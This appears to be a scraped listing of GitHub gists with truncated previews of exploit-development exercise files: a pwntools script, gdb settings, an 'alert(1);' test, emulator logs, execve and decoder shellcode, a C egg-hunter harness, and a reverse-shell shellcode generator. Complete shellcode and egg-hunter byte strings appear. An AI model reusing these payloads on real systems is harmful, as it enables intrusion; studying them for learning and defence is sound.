This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
from pwn import * | |
import time, sys | |
#Setup the binary | |
elf = context.binary = ELF('./teleporter') | |
#Enable logging | |
#context.log_level = 'debug' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
32bit | |
set disassembly-flavor intel | |
define hook-stop | |
info registers | |
x/24wx $esp | |
x/5i $eip | |
end | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(1); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
graph file linux_x86_exec.dot | |
verbose = 3 | |
[emu 0x0x9e08090 [31;1mdebug[0m ] cpu state eip=0x00417000 | |
[emu 0x0x9e08090 [31;1mdebug[0m ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000000 | |
[emu 0x0x9e08090 [31;1mdebug[0m ] esp=0x00416fce ebp=0x00000000 esi=0x00000000 edi=0x00000000 | |
[emu 0x0x9e08090 [31;1mdebug[0m ] Flags: | |
[emu 0x0x9e08090 [31;1mdebug[0m ] cpu state eip=0x00417000 | |
[emu 0x0x9e08090 [31;1mdebug[0m ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000000 | |
[emu 0x0x9e08090 [31;1mdebug[0m ] esp=0x00416fce ebp=0x00000000 esi=0x00000000 edi=0x00000000 | |
[emu 0x0x9e08090 [31;1mdebug[0m ] Flags: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Decoder Execve Stack Shellcode | |
; Author: Aditya Chaudhary | |
; Date: 5th Feb 2019 | |
global _start | |
section .text | |
_start: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Python Random Insertion Encoder | |
# Author: Aditya Chaudhary | |
# Date: 5th Feb 2019 | |
import random | |
shellcode = ("\x31\xc0\x50\x89\xe2\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Execve Stack Shellcode | |
; Author: Aditya Chaudhary | |
; Date: 27th Jan 2019 | |
global _start | |
section .text | |
_start: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include<stdio.h> | |
#include<string.h> | |
#define EGG "\x90\x50\x90\x50" | |
unsigned char egghunter[] = \ | |
"\x31\xc0\x89\xc7\xbf" | |
EGG | |
"\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x3a\x75\xee\x39\x7a\x04\x75\xe9\xff\xe2"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Egg Hunter | |
; Author: Aditya Chaudhary | |
; Date: 20th Jan 2019 | |
global _start | |
section .text |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Python Reverse Shellcode Generator | |
# Paste the reverse shell code and use command line args to provide port number | |
# python shellcode_rev_gen.py 127.1.1.1 7777 | |
#!/bin/python | |
import sys | |
import struct | |
if (len(sys.argv) < 3): | |
print "[#] Error: Please provide port number" |
NewerOlder